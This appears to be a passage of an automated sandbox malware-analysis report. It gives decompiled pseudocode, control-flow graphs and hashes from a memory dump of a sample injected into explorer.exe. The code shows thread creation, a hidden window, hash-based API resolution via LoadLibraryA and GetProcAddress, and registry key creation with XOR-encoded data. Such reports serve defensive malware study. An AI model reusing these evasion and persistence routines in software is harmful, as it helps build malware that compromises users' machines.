				intOrPtr _t92;
				struct _SECURITY_ATTRIBUTES* _t100;
				intOrPtr _t101;
				signed int _t104;
				signed int _t105;
				void* _t107;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t74 =  *0x7bf904; // 0x3b0
				_t100 = 0;
				if(E007AB149(_t74, 0x7530) >= 0) {
					_t43 =  *0x7bf908; // 0xeb0e90
					_t104 = 0;
					_t70 = 0;
					do {
						_t75 =  *((intOrPtr*)(_t70 + _t43));
						if( *((intOrPtr*)(_t70 + _t43)) == 0) {
							L6:
							if( *((intOrPtr*)(_t70 + _t43)) == _t100) {
								_t105 = _t104 << 5;
								if(_v8 == _t100) {
									 *(_t105 + _t43 + 0x10) = _t100;
									_t44 =  *0x7bf908; // 0xeb0e90
									 *(_t105 + _t44 + 0xc) = _t100;
									L14:
									_t76 =  *0x7bf908; // 0xeb0e90
									 *((intOrPtr*)(_t105 + _t76 + 0x14)) = _a8;
									_t46 =  *0x7bf908; // 0xeb0e90
									 *((intOrPtr*)(_t105 + _t46 + 8)) = _v12;
									_t47 = E007AB096(0, 1);
									_t79 =  *0x7bf908; // 0xeb0e90
									 *((intOrPtr*)(_t105 + _t79 + 0x1c)) = _t47;
									_t80 =  *0x7bf908; // 0xeb0e90
									_t29 = _t80 + _t105 + 4; // 0xeb0e94
									_t50 = CreateThread(_t100, _t100, E007AA1BD, _t80 + _t105, _t100, _t29);
									_t51 =  *0x7bf908; // 0xeb0e90
									 *(_t105 + _t51) = _t50;
									_t52 =  *0x7bf908; // 0xeb0e90
									if( *(_t105 + _t52) != _t100) {
										SetThreadPriority( *(_t105 + _t52), 0xffffffff);
										_t83 =  *0x7bf908; // 0xeb0e90
										 *0x7bf90c =  *0x7bf90c + 1;
										E007AB165( *((intOrPtr*)(_t105 + _t83 + 0x1c)));
										_t101 =  *0x7bf908; // 0xeb0e90
										_t100 = _t101 + _t105;
									} else {
										_t57 =  *0x7bf818; // 0xeaf6c8
										 *((intOrPtr*)(_t57 + 0x30))( *((intOrPtr*)(_t105 + _t52 + 0x1c)));
										_t59 =  *0x7bf908; // 0xeb0e90
										_t36 = _t59 + 0xc; // 0xeb0e9c
										_t87 = _t36 + _t105;
										if( *((intOrPtr*)(_t36 + _t105)) != _t100) {
											E007A8BF4(_t87,  *((intOrPtr*)(_t105 + _t59 + 0x10)));
											_t59 =  *0x7bf908; // 0xeb0e90
										}
										E007A8D6D(_t59 + _t105, _t100, 0x20);
									}
									L19:
									_t85 =  *0x7bf904; // 0x3b0
									E007AB165(_t85);
									_t56 = _t100;
									L20:
									return _t56;
								}
								_t72 = _a4;
								_t63 = E007A8BDE(_t72);
								_t91 =  *0x7bf908; // 0xeb0e90
								 *((intOrPtr*)(_t105 + _t91 + 0xc)) = _t63;
								_t64 =  *0x7bf908; // 0xeb0e90
								if( *((intOrPtr*)(_t105 + _t64 + 0xc)) == _t100) {
									goto L19;
								}
								 *((intOrPtr*)(_t105 + _t64 + 0x10)) = _t72;
								_t65 =  *0x7bf908; // 0xeb0e90
								E007A8CBB( *((intOrPtr*)(_t105 + _t65 + 0xc)), _v8, _t72);
								_t107 = _t107 + 0xc;
								goto L14;
							}
							goto L7;
						}
						if(E007AA145(_t75) != 0) {
							_t43 =  *0x7bf908; // 0xeb0e90
							goto L7;
						}
						_t92 =  *0x7bf908; // 0xeb0e90
						E007AA15B(_t70 + _t92, 0);
						_t43 =  *0x7bf908; // 0xeb0e90
						goto L6;
						L7:
						_t70 = _t70 + 0x20;
						_t104 = _t104 + 1;
					} while (_t70 < 0x1000);
					goto L19;
				}
				_t56 = 0;
				goto L20;
			}

































                                                                                                                                                                        0x007aa208
                                                                                                                                                                        0x007aa209
                                                                                                                                                                        0x007aa20a
                                                                                                                                                                        0x007aa212
                                                                                                                                                                        0x007aa215
                                                                                                                                                                        0x007aa21c
                                                                                                                                                                        0x007aa225
                                                                                                                                                                        0x007aa22e
                                                                                                                                                                        0x007aa235
                                                                                                                                                                        0x007aa237
                                                                                                                                                                        0x007aa239
                                                                                                                                                                        0x007aa239
                                                                                                                                                                        0x007aa23e
                                                                                                                                                                        0x007aa25e
                                                                                                                                                                        0x007aa261
                                                                                                                                                                        0x007aa27b
                                                                                                                                                                        0x007aa281
                                                                                                                                                                        0x007aa2c1
                                                                                                                                                                        0x007aa2c5
                                                                                                                                                                        0x007aa2ca
                                                                                                                                                                        0x007aa2ce
                                                                                                                                                                        0x007aa2ce
                                                                                                                                                                        0x007aa2da
                                                                                                                                                                        0x007aa2de
                                                                                                                                                                        0x007aa2e6
                                                                                                                                                                        0x007aa2ec
                                                                                                                                                                        0x007aa2f1
                                                                                                                                                                        0x007aa2f7
                                                                                                                                                                        0x007aa2fb
                                                                                                                                                                        0x007aa303
                                                                                                                                                                        0x007aa315
                                                                                                                                                                        0x007aa31a
                                                                                                                                                                        0x007aa31f
                                                                                                                                                                        0x007aa322
                                                                                                                                                                        0x007aa32a
                                                                                                                                                                        0x007aa36c
                                                                                                                                                                        0x007aa372
                                                                                                                                                                        0x007aa378
                                                                                                                                                                        0x007aa382
                                                                                                                                                                        0x007aa387
                                                                                                                                                                        0x007aa38d
                                                                                                                                                                        0x007aa32c
                                                                                                                                                                        0x007aa330
                                                                                                                                                                        0x007aa335
                                                                                                                                                                        0x007aa338
                                                                                                                                                                        0x007aa33d
                                                                                                                                                                        0x007aa340
                                                                                                                                                                        0x007aa344
                                                                                                                                                                        0x007aa34b
                                                                                                                                                                        0x007aa350
                                                                                                                                                                        0x007aa356
                                                                                                                                                                        0x007aa35d
                                                                                                                                                                        0x007aa362
                                                                                                                                                                        0x007aa38f
                                                                                                                                                                        0x007aa38f
                                                                                                                                                                        0x007aa395
                                                                                                                                                                        0x007aa39b
                                                                                                                                                                        0x007aa39e
                                                                                                                                                                        0x007aa3a0
                                                                                                                                                                        0x007aa3a0
                                                                                                                                                                        0x007aa283
                                                                                                                                                                        0x007aa287
                                                                                                                                                                        0x007aa28d
                                                                                                                                                                        0x007aa293
                                                                                                                                                                        0x007aa297
                                                                                                                                                                        0x007aa2a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa2a6
                                                                                                                                                                        0x007aa2aa
                                                                                                                                                                        0x007aa2b7
                                                                                                                                                                        0x007aa2bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa2bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa261
                                                                                                                                                                        0x007aa247
                                                                                                                                                                        0x007aa274
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa274
                                                                                                                                                                        0x007aa249
                                                                                                                                                                        0x007aa254
                                                                                                                                                                        0x007aa259
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa263
                                                                                                                                                                        0x007aa263
                                                                                                                                                                        0x007aa266
                                                                                                                                                                        0x007aa267
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa26f
                                                                                                                                                                        0x007aa227
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: j>{M
                                                                                                                                                                        • API String ID: 0-1785681049
                                                                                                                                                                        • Opcode ID: 775489564eaca1af8d9c241eeb70ce1e98bb77c1d126bf5b888a6764d87a2cf6
                                                                                                                                                                        • Instruction ID: aa2cb2c7e766df66de2e24ea2a44a74d53f4fab03e9d64e929dd584e2ce82bc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 775489564eaca1af8d9c241eeb70ce1e98bb77c1d126bf5b888a6764d87a2cf6
                                                                                                                                                                        • Instruction Fuzzy Hash: 86415C71611608FFCB29DF29EC84F26B7E9EBCA7143148729E806C3265D739B841CB15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A33B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 361 7a33b1-7a3425 call 7a8d6d call 7a96da RegisterClassExA 367 7a34a2-7a34a9 361->367 368 7a3427-7a3456 CreateWindowExA 361->368 369 7a34ab-7a34ac 367->369 370 7a34b4-7a34c9 367->370 368->370 371 7a3458-7a345a 368->371 369->370 373 7a3462-7a3470 371->373 375 7a348f-7a34a0 373->375 375->367 377 7a3472-7a3475 375->377 377->367 378 7a3477-7a3487 377->378 378->375
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E007A33B1(void* __eflags) {
				struct _WNDCLASSEXA _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				void* _t62;
				struct HINSTANCE__* _t63;

				_t25 =  *0x7bf818; // 0xeaf6c8
				_t63 =  *((intOrPtr*)(_t25 + 0x10))(0);
				E007A8D6D( &_v52, 0, 0x30);
				_t59 =  *0x7bf81c; // 0x7d0000
				_push(_t59 + 0x648);
				_push(0x32);
				_t62 = 0x1e;
				E007A96DA( &_v144, _t62);
				_v52.style = 3;
				_v52.cbSize = 0x30;
				_v52.lpszClassName =  &_v144;
				_v52.lpfnWndProc = E007A334E;
				_v52.hInstance = _t63;
				if(RegisterClassExA( &_v52) == 0) {
					L6:
					_t34 =  *0x7bf8b0; // 0x100070
					if(_t34 != 0) {
						_t39 =  *0x7bf828; // 0xeaf838
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x7bf828; // 0xeaf838
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t63);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t63, 0);
				 *0x7bf8b0 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				_t45 =  *0x7bf828; // 0xeaf838, executed
				 *((intOrPtr*)(_t45 + 0x14))(_t44, 0);
				_t47 =  *0x7bf828; // 0xeaf838
				 *((intOrPtr*)(_t47 + 0x18))( *0x7bf8b0);
				while(1) {
					_t50 =  *0x7bf828; // 0xeaf838
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x7bf828; // 0xeaf838
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x7bf828; // 0xeaf838
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}




















                                                                                                                                                                        0x007a33ba
                                                                                                                                                                        0x007a33c9
                                                                                                                                                                        0x007a33d0
                                                                                                                                                                        0x007a33d5
                                                                                                                                                                        0x007a33e1
                                                                                                                                                                        0x007a33e2
                                                                                                                                                                        0x007a33e6
                                                                                                                                                                        0x007a33ed
                                                                                                                                                                        0x007a33f5
                                                                                                                                                                        0x007a3402
                                                                                                                                                                        0x007a3409
                                                                                                                                                                        0x007a340f
                                                                                                                                                                        0x007a341c
                                                                                                                                                                        0x007a3425
                                                                                                                                                                        0x007a34a2
                                                                                                                                                                        0x007a34a2
                                                                                                                                                                        0x007a34a9
                                                                                                                                                                        0x007a34ac
                                                                                                                                                                        0x007a34b1
                                                                                                                                                                        0x007a34b1
                                                                                                                                                                        0x007a34b4
                                                                                                                                                                        0x007a34bc
                                                                                                                                                                        0x007a34c1
                                                                                                                                                                        0x007a34c9
                                                                                                                                                                        0x007a34c9
                                                                                                                                                                        0x007a344c
                                                                                                                                                                        0x007a344f
                                                                                                                                                                        0x007a3456
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a345a
                                                                                                                                                                        0x007a345f
                                                                                                                                                                        0x007a3462
                                                                                                                                                                        0x007a346d
                                                                                                                                                                        0x007a348f
                                                                                                                                                                        0x007a3496
                                                                                                                                                                        0x007a349b
                                                                                                                                                                        0x007a34a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3475
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a347b
                                                                                                                                                                        0x007a3480
                                                                                                                                                                        0x007a3487
                                                                                                                                                                        0x007a348c
                                                                                                                                                                        0x007a348c
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • RegisterClassExA.USER32(00000030), ref: 007A341F
                                                                                                                                                                        • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 007A344C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCreateRegisterWindowmemset
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 2030675355-4108050209
                                                                                                                                                                        • Opcode ID: a6f41dcd7f5f4e1bbe7c87e62297a48bd5b1cce3a9d0ed2eef831f99602451ec
                                                                                                                                                                        • Instruction ID: f3bd056ea94cf6975001eb228ba132ba908333a1e593b3234662803124f5a329
                                                                                                                                                                        • Opcode Fuzzy Hash: a6f41dcd7f5f4e1bbe7c87e62297a48bd5b1cce3a9d0ed2eef831f99602451ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 6631C6B2500118AFEB11DFA8EC88FAA77FCEB09754F008266F505D7161DB39EE458B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AEEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 380 7aeebb-7aeed2 381 7aef2f 380->381 382 7aeed4-7aeefc 380->382 384 7aef31-7aef35 381->384 382->381 383 7aeefe-7aef21 call 7aa43d call 7ae2c5 382->383 389 7aef23-7aef2d 383->389 390 7aef36-7aef4d 383->390 389->381 389->383 391 7aef4f-7aef57 390->391 392 7aefa3-7aefa5 390->392 391->392 393 7aef59 391->393 392->384 394 7aef5b-7aef61 393->394 395 7aef63-7aef65 394->395 396 7aef71-7aef82 394->396 395->396 399 7aef67-7aef6f 395->399 397 7aef87-7aef93 LoadLibraryA 396->397 398 7aef84-7aef85 396->398 397->381 400 7aef95-7aef9f GetProcAddress 397->400 398->397 399->394 399->396 400->381 401 7aefa1 400->401 401->384
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AEEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E007AE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E007AA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                        0x007aeec4
                                                                                                                                                                        0x007aeec6
                                                                                                                                                                        0x007aeec9
                                                                                                                                                                        0x007aeecc
                                                                                                                                                                        0x007aeed2
                                                                                                                                                                        0x007aef2f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef2f
                                                                                                                                                                        0x007aeed4
                                                                                                                                                                        0x007aeedf
                                                                                                                                                                        0x007aeee2
                                                                                                                                                                        0x007aeee7
                                                                                                                                                                        0x007aeeec
                                                                                                                                                                        0x007aeeef
                                                                                                                                                                        0x007aeef1
                                                                                                                                                                        0x007aeef4
                                                                                                                                                                        0x007aeef7
                                                                                                                                                                        0x007aeefc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeefe
                                                                                                                                                                        0x007aeefe
                                                                                                                                                                        0x007aef10
                                                                                                                                                                        0x007aef1d
                                                                                                                                                                        0x007aef21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef23
                                                                                                                                                                        0x007aef26
                                                                                                                                                                        0x007aef27
                                                                                                                                                                        0x007aef2d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef2d
                                                                                                                                                                        0x007aef44
                                                                                                                                                                        0x007aef49
                                                                                                                                                                        0x007aef4d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef59
                                                                                                                                                                        0x007aef59
                                                                                                                                                                        0x007aef5b
                                                                                                                                                                        0x007aef5b
                                                                                                                                                                        0x007aef61
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef67
                                                                                                                                                                        0x007aef6b
                                                                                                                                                                        0x007aef6f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef6f
                                                                                                                                                                        0x007aef75
                                                                                                                                                                        0x007aef7d
                                                                                                                                                                        0x007aef82
                                                                                                                                                                        0x007aef85
                                                                                                                                                                        0x007aef85
                                                                                                                                                                        0x007aef87
                                                                                                                                                                        0x007aef8b
                                                                                                                                                                        0x007aef93
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef97
                                                                                                                                                                        0x007aef9f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aef9f

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 007AEF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007AEF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: d1128dc244a04f66bb4dcd51e7459e23ff254cc316cf15742f70b97029645074
                                                                                                                                                                        • Instruction ID: 7b0457dbd128005452926f97e4a28597dc8e76f6f82e8ebc0736a0f046a465d0
                                                                                                                                                                        • Opcode Fuzzy Hash: d1128dc244a04f66bb4dcd51e7459e23ff254cc316cf15742f70b97029645074
                                                                                                                                                                        • Instruction Fuzzy Hash: F631B071A001169FCF64CF6DC884BAEBBE5EF86304F284569D805E7351E738E941CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AA633 Relevance: 4.8, APIs: 3, Instructions: 251registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 402 7aa633-7aa665 call 7a8bde 405 7aa66b-7aa68b call 7ac43a 402->405 406 7aa902-7aa906 402->406 409 7aa68d 405->409 410 7aa690-7aa6a5 call 7a9dd8 405->410 409->410 413 7aa6ab-7aa6c3 410->413 414 7aa7de-7aa7eb 410->414 421 7aa7db 413->421 422 7aa6c9-7aa6e5 413->422 415 7aa82c-7aa83c call 7a9a07 414->415 416 7aa7ed-7aa80e 414->416 425 7aa83f-7aa841 415->425 423 7aa810-7aa82a call 7a9a07 416->423 424 7aa844-7aa864 call 7a8b9c RegOpenKeyExA 416->424 421->414 422->424 431 7aa6eb-7aa705 call 7a9a07 422->431 423->425 433 7aa88b-7aa890 424->433 434 7aa866-7aa87b RegCreateKeyA 424->434 425->424 436 7aa8d4-7aa8f1 call 7a8bf4 call 7a8d6d 431->436 442 7aa70b-7aa723 431->442 438 7aa898 433->438 439 7aa892 433->439 435 7aa87d-7aa882 434->435 434->436 440 7aa886-7aa889 435->440 441 7aa884 435->441 454 7aa8f3-7aa900 call 7a8bf4 436->454 443 7aa89b-7aa8a5 RegCloseKey 438->443 439->438 440->443 441->440 451 7aa79b-7aa7a0 442->451 452 7aa725-7aa76c call 7a9df2 call 7a9a5a call 7a8baf call 7a9930 442->452 443->436 445 7aa8a7-7aa8bb call 7aa43d 443->445 445->454 456 7aa8bd-7aa8d0 445->456 459 7aa7a6-7aa7d9 call 7a9a07 call 7a8bf4 451->459 474 7aa77b-7aa799 call 7a8bf4 * 2 452->474 475 7aa76e-7aa773 452->475 454->406 456->456 460 7aa8d2 456->460 459->424 460->454 474->459 475->474 476 7aa775 475->476 476->474
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E007AA633(char __ecx, int __edx, void* __fp0, intOrPtr _a4, int* _a8, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				int _v44;
				char _v108;
				int _t85;
				char _t89;
				void* _t90;
				char* _t91;
				intOrPtr* _t96;
				void* _t107;
				int* _t115;
				intOrPtr _t118;
				char* _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				char _t129;
				intOrPtr _t130;
				intOrPtr _t132;
				char* _t135;
				int _t139;
				int _t143;
				intOrPtr _t144;
				intOrPtr* _t150;
				int _t151;
				char _t157;
				int _t159;
				intOrPtr _t160;
				intOrPtr _t167;
				int _t172;
				char* _t173;
				char* _t174;
				char _t175;
				void* _t176;
				void* _t177;
				void* _t179;

				_t172 = 0;
				_v24 = __edx;
				_t173 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t85 = E007A8BDE(0x110);
				_t151 = _t85;
				_v44 = _t151;
				_t180 = _t151;
				if(_t151 == 0) {
					return _t85;
				}
				_t154 = _a4;
				 *((intOrPtr*)(_t151 + 0x108)) = _a4;
				E007AC43A(_a4, __edx, _t180, __fp0, _t154,  &_v108);
				_t157 = _v108;
				_t89 = _t157;
				if(_t157 - 0x61 <= 0x19) {
					_t89 = _t89 - 0x20;
				}
				_v108 = _t89;
				_t90 = E007A9DD8(0xf30);
				_t159 = _v24;
				_v16 = _t90;
				if(_t159 == 0) {
					L15:
					_t160 =  *0x7bf81c; // 0x7d0000
					__eflags =  *((intOrPtr*)(_t160 + 0x214)) - 3;
					if( *((intOrPtr*)(_t160 + 0x214)) != 3) {
						_push(_t172);
						_push( &_v108);
						_push("\\");
						_t91 = E007A9A07(_t90);
						_t177 = _t177 + 0x10;
						L19:
						_t173 = _t91;
						_v20 = _t173;
						goto L20;
					}
					_v24 = _t172;
					_v8 = 0x80000003;
					_t118 =  *0x7bf820; // 0xeaf8b8
					 *((intOrPtr*)(_t118 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x110)))),  &_v24);
					__eflags = _v24 - _t173;
					if(_v24 == _t173) {
						goto L20;
					}
					_push(_t172);
					_push( &_v108);
					_t121 = "\\";
					_push(_t121);
					_push(_v16);
					_push(_t121);
					_t91 = E007A9A07(_v24);
					_t177 = _t177 + 0x18;
					goto L19;
				} else {
					_t122 =  *0x7bf81c; // 0x7d0000
					_push( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x110)))));
					_t124 =  *0x7bf820; // 0xeaf8b8
					_push(_t159);
					if( *((intOrPtr*)(_t124 + 0x68))() != 0) {
						_t90 = _v16;
						goto L15;
					}
					_v12 = _t172;
					_t127 =  *0x7bf820; // 0xeaf8b8
					_v8 = 0x80000003;
					 *((intOrPtr*)(_t127 + 0x20))(_v24,  &_v12);
					if(_v12 == _t173) {
						L20:
						E007A8B9C( &_v16);
						if(RegOpenKeyExA(_v8, _t173, _t172, 0x20019,  &_v28) == 0) {
							_t96 = _a8;
							__eflags = _t96;
							if(_t96 != 0) {
								 *_t96 = 1;
							}
							RegCloseKey(_v28);
							L28:
							if(_t173 == 0) {
								L32:
								E007A8BF4( &_v44, 0x110);
								E007A8D6D( &_v108, _t172, 0x40);
								_t151 = _t172;
								L33:
								E007A8BF4( &_v20, 0xffffffff);
								return _t151;
							}
							 *((intOrPtr*)(_t151 + 0x10c)) = _v8;
							_t107 = E007AA43D(_t173);
							 *_t151 = _t107;
							if(_t107 == 0) {
								goto L33;
							} else {
								goto L30;
							}
							do {
								L30:
								 *(_t151 + _t172 + 4) =  *(_t176 + (_t172 & 0x00000003) + 8) ^ _t173[_t172];
								_t172 = _t172 + 1;
							} while (_t172 <  *_t151);
							goto L33;
						}
						_v16 = _t172;
						if(RegCreateKeyA(_v8, _t173,  &_v16) != 0) {
							goto L32;
						}
						_t115 = _a8;
						if(_t115 != 0) {
							 *_t115 = _t172;
						}
						RegCloseKey(_v16);
						goto L28;
					}
					_push(_t172);
					_push(_v16);
					_t174 = "\\";
					_push(_t174);
					_t129 = E007A9A07(_v12);
					_t177 = _t177 + 0x10;
					_v40 = _t129;
					if(_t129 == 0) {
						goto L32;
					}
					_push( &_v36);
					_push(0x20019);
					_push(_t172);
					_push(_t129);
					_t130 =  *0x7bf820; // 0xeaf8b8
					_push(_v8);
					if( *((intOrPtr*)(_t130 + 0x14))() == 0) {
						_t132 =  *0x7bf820; // 0xeaf8b8
						 *((intOrPtr*)(_t132 + 0x1c))(_v36);
					} else {
						_t139 = E007A9DF2( &_v36, 0x9c4);
						_push(_t172);
						_push(_t139);
						_push(0x7bc9a0);
						_v24 = _t139;
						_t175 = E007A9A5A(_v32);
						_v32 = _t175;
						E007A8BAF( &_v24);
						_t179 = _t177 + 0x18;
						_t143 = E007A9930(_v12);
						_push(_t175);
						_push(_t143);
						_push(_v8);
						_v24 = _t143;
						_t144 =  *0x7bf820; // 0xeaf8b8
						if( *((intOrPtr*)(_t144 + 0x30))() == 0) {
							_t150 = _a12;
							if(_t150 != 0) {
								 *_t150 = 1;
							}
						}
						E007A8BF4( &_v32, 0xfffffffe);
						E007A8BF4( &_v24, 0xfffffffe);
